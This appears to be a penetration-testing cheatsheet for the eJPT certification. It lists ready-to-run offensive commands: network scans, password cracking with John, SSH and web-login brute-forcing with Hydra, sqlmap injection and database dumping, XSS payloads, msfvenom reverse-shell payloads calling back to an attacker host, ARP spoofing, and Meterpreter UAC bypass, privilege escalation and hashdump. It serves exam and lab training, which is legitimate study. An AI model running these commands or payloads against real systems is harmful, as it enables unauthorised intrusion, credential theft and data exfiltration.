eJPT-Cheatsheet

This is a cheatsheet for the eJPT exam and course.

Nmap

nmap -sn 10.10.10.0/24
nmap -sV -p- -iL targets -oN nmap.initial -v
nmap -A -p- -iL targets -oN nmap.aggressive -v
nmap -p <port> --script=vuln -v <target>

fPing

fping -a -g 10.10.10.0/24 2>/dev/null > targets

IP Route

Syntax
ip route add <Network-range> via <router-IP> dev <interface>
e.g.
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0

John

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 <hash-file>
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

dirb

dirb http://10.10.10.10/
dirb http://10.10.10.10/dir -u admin:admin

I suggest using dirbuster for better speed. Keep the threads at 20 and use the /usr/share/wordlists/dirb/common.txt wordlist.

Netcat

Listening for reverse shell
nc -nvlp 1234

Banner Grabbing
nc -nv 10.10.10.10 <port>

SQLMap

Check if injection exists

sqlmap -r Post.req
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"

Get databases if injection exists

sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs

Get Tables in a Database

sqlmap -r login.req -D dbname --tables
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables

Get data from a database table

sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump

Hydra

SSH Login Bruteforcing
hydra -v -V -u -L users.txt -P passwords.txt -t 1 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 10.10.10.10 ssh
You can use the same commands for FTP; just replace ssh with ftp.

HTTP POST Form
hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V

You will know which wordlists to use when the time comes

XSS

<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>

This is a great filter bypass cheatsheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

msfvenom shells

JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f war > shell.war

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

Metasploit Meterpreter autoroute

run autoroute -s 10.10.10.0/24

ARPSpoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target-IP> -r <host-IP>
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36

SMB Enumeration

Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v

Access Share
smbclient //10.10.10.10/share_name

FTP Enumeration

nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v

Login to FTP server
ftp 10.10.10.10

Meterpreter

ps
getuid
getpid
getsystem
ps -U SYSTEM

CHECK UAC/Privileges
run post/windows/gather/win_privs

BYPASS UAC
Background the session first
use exploit/windows/local/bypassuac
set session <session-id>

After PrivEsc
migrate <pid>
hashdump

Windows Command Line

To search for a file starting from current directory
dir /b/s "*.conf*"
dir /b/s "*.txt*"
dir /b/s "*filename*"

Check routing table
route print
netstat -r

Check Users
net users

List drives on the machine
wmic logicaldisk get Caption,Description,providername